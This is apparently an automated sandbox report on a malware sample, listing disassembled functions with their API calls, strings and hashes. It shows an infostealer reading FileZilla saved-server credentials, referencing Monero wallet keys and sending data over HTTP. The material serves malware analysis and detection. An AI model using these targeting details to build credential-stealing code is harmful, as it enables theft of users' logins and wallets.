Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e10485b362918ca75ab05991dd8484e8ff2d9527d4323fa16b94cda55e6c8e41
Instruction ID: b1afb9d9d898ad35807c671c3e2675a0a13cefbe209d4a9fd4ac15387a16f684
Opcode Fuzzy Hash: e10485b362918ca75ab05991dd8484e8ff2d9527d4323fa16b94cda55e6c8e41
Instruction Fuzzy Hash: 9E31F5B3A091205BE308693DEC197BABBD6EBD4320F2B052ED5C6D7784ED71580186C2

Function 00E575A8 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54

Function 00E29AA0 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90

Function 00E203B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Part of subcall function 00E28F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00E28F9B

Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22

Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6

Part of subcall function 00E1A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00E1A13C
Part of subcall function 00E1A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00E1A161
Part of subcall function 00E1A110: LocalAlloc.KERNEL32(00000040,?), ref: 00E1A181
Part of subcall function 00E1A110: ReadFile.KERNEL32(000000FF,?,00000000,00E1148F,00000000), ref: 00E1A1AA
Part of subcall function 00E1A110: LocalFree.KERNEL32(00E1148F), ref: 00E1A1E0
Part of subcall function 00E1A110: CloseHandle.KERNEL32(000000FF), ref: 00E1A1EA

Part of subcall function 00E28FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00E28FE2

GetProcessHeap.KERNEL32(00000000,000F423F,00E30DBF,00E30DBE,00E30DBB,00E30DBA), ref: 00E204C2
RtlAllocateHeap.NTDLL(00000000), ref: 00E204C9
StrStrA.SHLWAPI(00000000,<Host>), ref: 00E204E5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E204F3
StrStrA.SHLWAPI(00000000,<Port>), ref: 00E2052F
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E2053D
StrStrA.SHLWAPI(00000000,<User>), ref: 00E20579
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E20587
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00E205C3
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E205D5
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E20662
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E2067A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E20692
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E206AA
lstrcat.KERNEL32(?,browser: FileZilla), ref: 00E206C2
lstrcat.KERNEL32(?,profile: null), ref: 00E206D1
lstrcat.KERNEL32(?,url: ), ref: 00E206E0
lstrcat.KERNEL32(?,00000000), ref: 00E206F3
lstrcat.KERNEL32(?,00E31770), ref: 00E20702
lstrcat.KERNEL32(?,00000000), ref: 00E20715
lstrcat.KERNEL32(?,00E31774), ref: 00E20724
lstrcat.KERNEL32(?,login: ), ref: 00E20733
lstrcat.KERNEL32(?,00000000), ref: 00E20746
lstrcat.KERNEL32(?,00E31780), ref: 00E20755
lstrcat.KERNEL32(?,password: ), ref: 00E20764
lstrcat.KERNEL32(?,00000000), ref: 00E20777
lstrcat.KERNEL32(?,00E31790), ref: 00E20786
lstrcat.KERNEL32(?,00E31794), ref: 00E20795
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00E30DB7), ref: 00E207EE

Strings

\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 00E20404
<User>, xrefs: 00E20570
<Pass encoding="base64">, xrefs: 00E205BA
url: , xrefs: 00E206D7
<Host>, xrefs: 00E204DC
browser: FileZilla, xrefs: 00E206B9
profile: null, xrefs: 00E206C8
<Port>, xrefs: 00E20526
password: , xrefs: 00E2075B
login: , xrefs: 00E2072A

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 1942843190-555421843
Opcode ID: c31cf8073154590c85fe8da841d53e4b72dbddf4947ed1e55c3b435840b2a812
Instruction ID: a6241a9044673b64beb8774b03c98dff531a4c6a5c39fef22df7feda0fea8438
Opcode Fuzzy Hash: c31cf8073154590c85fe8da841d53e4b72dbddf4947ed1e55c3b435840b2a812
Instruction Fuzzy Hash: 19D16171D00218ABCB14EBF4ED5AEEE77B9AF14700F449569F102B7095EF35AA04CB61

Function 00E159B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6

Part of subcall function 00E14800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00E14889
Part of subcall function 00E14800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00E14899

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00E15A48
StrCmpCA.SHLWAPI(?,0099FB60), ref: 00E15A63
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00E15BE3
lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0099FB20,00000000,?,0099EB60,00000000,?,00E31B4C), ref: 00E15EC1
lstrlen.KERNEL32(00000000), ref: 00E15ED2
GetProcessHeap.KERNEL32(00000000,?), ref: 00E15EE3
RtlAllocateHeap.NTDLL(00000000), ref: 00E15EEA
lstrlen.KERNEL32(00000000), ref: 00E15EFF
lstrlen.KERNEL32(00000000), ref: 00E15F28
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00E15F41
lstrlen.KERNEL32(00000000,?,?), ref: 00E15F6B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00E15F7F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00E15F9C
InternetCloseHandle.WININET(00000000), ref: 00E16000
InternetCloseHandle.WININET(00000000), ref: 00E1600D
HttpOpenRequestA.WININET(00000000,0099FA30,?,0099F2D8,00000000,00000000,00400100,00000000), ref: 00E15C48

Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92

InternetCloseHandle.WININET(00000000), ref: 00E16017

Strings

------, xrefs: 00E15C5B
", xrefs: 00E15D25
------, xrefs: 00E15AE6
------, xrefs: 00E15D9C
", xrefs: 00E15E66

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
String ID: "$"$------$------$------
API String ID: 874700897-2180234286
Opcode ID: 055fdad491dd5b4aa30d05e2390918868016a8d9edc14f0cf37669189a2106db
Instruction ID: 34a57bfcb2a3fe544cefbbc9560b6e82fe07180df84247df2ae7bb671fa89d3c
Opcode Fuzzy Hash: 055fdad491dd5b4aa30d05e2390918868016a8d9edc14f0cf37669189a2106db
Instruction Fuzzy Hash: AF120371920128ABCB15EBA0ECA6FEEB3B9BF14700F4855E9F10676091DF706A48CF55

Function 00E1CFF0 Relevance: 30.4, APIs: 20, Instructions: 375stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

Part of subcall function 00E28CF0: GetSystemTime.KERNEL32(00E30E1B,0099EA10,00E305B6,?,?,00E113F9,?,0000001A,00E30E1B,00000000,?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E28D16

Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E1D083
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00E1D1C7
RtlAllocateHeap.NTDLL(00000000), ref: 00E1D1CE
lstrcat.KERNEL32(?,00000000), ref: 00E1D308
lstrcat.KERNEL32(?,00E31570), ref: 00E1D317
lstrcat.KERNEL32(?,00000000), ref: 00E1D32A
lstrcat.KERNEL32(?,00E31574), ref: 00E1D339
lstrcat.KERNEL32(?,00000000), ref: 00E1D34C
lstrcat.KERNEL32(?,00E31578), ref: 00E1D35B
lstrcat.KERNEL32(?,00000000), ref: 00E1D36E
lstrcat.KERNEL32(?,00E3157C), ref: 00E1D37D
lstrcat.KERNEL32(?,00000000), ref: 00E1D390
lstrcat.KERNEL32(?,00E31580), ref: 00E1D39F
lstrcat.KERNEL32(?,00000000), ref: 00E1D3B2
lstrcat.KERNEL32(?,00E31584), ref: 00E1D3C1
lstrcat.KERNEL32(?,00000000), ref: 00E1D3D4
lstrcat.KERNEL32(?,00E31588), ref: 00E1D3E3

Part of subcall function 00E2AB30: lstrlen.KERNEL32(UO,?,?,00E14F55,00E30DDF), ref: 00E2AB3B
Part of subcall function 00E2AB30: lstrcpy.KERNEL32(00E30DDF,00000000), ref: 00E2AB95

lstrlen.KERNEL32(?), ref: 00E1D42A
lstrlen.KERNEL32(?), ref: 00E1D439

Part of subcall function 00E2AD80: StrCmpCA.SHLWAPI(00000000,00E31568,00E1D2A2,00E31568,00000000), ref: 00E2AD9F

DeleteFileA.KERNEL32(00000000), ref: 00E1D4B4

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: 22daf2edd993ca7bc3ed64747f2d6c73ca7bf9125ad9989eeb957d81aca29b68
Instruction ID: df2a1dd11da8654effa7a6711bb218ae810ce5a0f213fd0e2f43d248e847947e
Opcode Fuzzy Hash: 22daf2edd993ca7bc3ed64747f2d6c73ca7bf9125ad9989eeb957d81aca29b68
Instruction Fuzzy Hash: 13E16171910118ABCB18FBA0ED96EEE77B9BF14701F0455A8F10776091DF36AE48CB62

Function 00E1CA90 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 384filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0099DE20,00000000,?,00E31544,00000000,?,?), ref: 00E1CB6C
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 00E1CB89
GetFileSize.KERNEL32(00000000,00000000), ref: 00E1CB95
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E1CBA8
ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00E1CBD9
StrStrA.SHLWAPI(?,0099DE80,00E30B56), ref: 00E1CBF7
StrStrA.SHLWAPI(00000000,0099DE38), ref: 00E1CC1E
StrStrA.SHLWAPI(?,0099E6C8,00000000,?,00E31550,00000000,?,00000000,00000000,?,00998AA8,00000000,?,00E3154C,00000000,?), ref: 00E1CDA2
StrStrA.SHLWAPI(00000000,0099E428), ref: 00E1CDB9

Part of subcall function 00E1C920: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00E1C971
Part of subcall function 00E1C920: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00E1C97C

StrStrA.SHLWAPI(?,0099E428,00000000,?,00E31554,00000000,?,00000000,00998AB8), ref: 00E1CE5A
StrStrA.SHLWAPI(00000000,00998A58), ref: 00E1CE71

Part of subcall function 00E1C920: lstrcat.KERNEL32(?,00E30B47), ref: 00E1CA43
Part of subcall function 00E1C920: lstrcat.KERNEL32(?,00E30B4B), ref: 00E1CA57
Part of subcall function 00E1C920: lstrcat.KERNEL32(?,00E30B4E), ref: 00E1CA78

lstrlen.KERNEL32(00000000), ref: 00E1CF44
CloseHandle.KERNEL32(00000000), ref: 00E1CF9C

Strings

, xrefs: 00E1CAC6

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
String ID:
API String ID: 3744635739-3916222277
Opcode ID: 2355afd0aedc834fb7609daeee035ccb41617e21faf2f4f8adc5e2f39891fa0d
Instruction ID: bac239d91dad335025388c42a53dc157dc251f04e61bfbd1db91fb1eb9f2c5ec
Opcode Fuzzy Hash: 2355afd0aedc834fb7609daeee035ccb41617e21faf2f4f8adc5e2f39891fa0d
Instruction Fuzzy Hash: C4E12D71900118ABCB14EBA4ECA2FEEB7B9BF54300F0855A9F10777191EF356A49CB61

Function 00E284B0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

RegOpenKeyExA.ADVAPI32(00000000,0099BD90,00000000,00020019,00000000,00E305BE), ref: 00E28534
RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00E285B6
wsprintfA.USER32 ref: 00E285E9
RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 00E2860B
RegCloseKey.ADVAPI32(00000000), ref: 00E2861C
RegCloseKey.ADVAPI32(00000000), ref: 00E28629

Part of subcall function 00E2AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00E2AAF6

Strings

- , xrefs: 00E28733
?, xrefs: 00E2850A
%s\%s, xrefs: 00E285DD

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
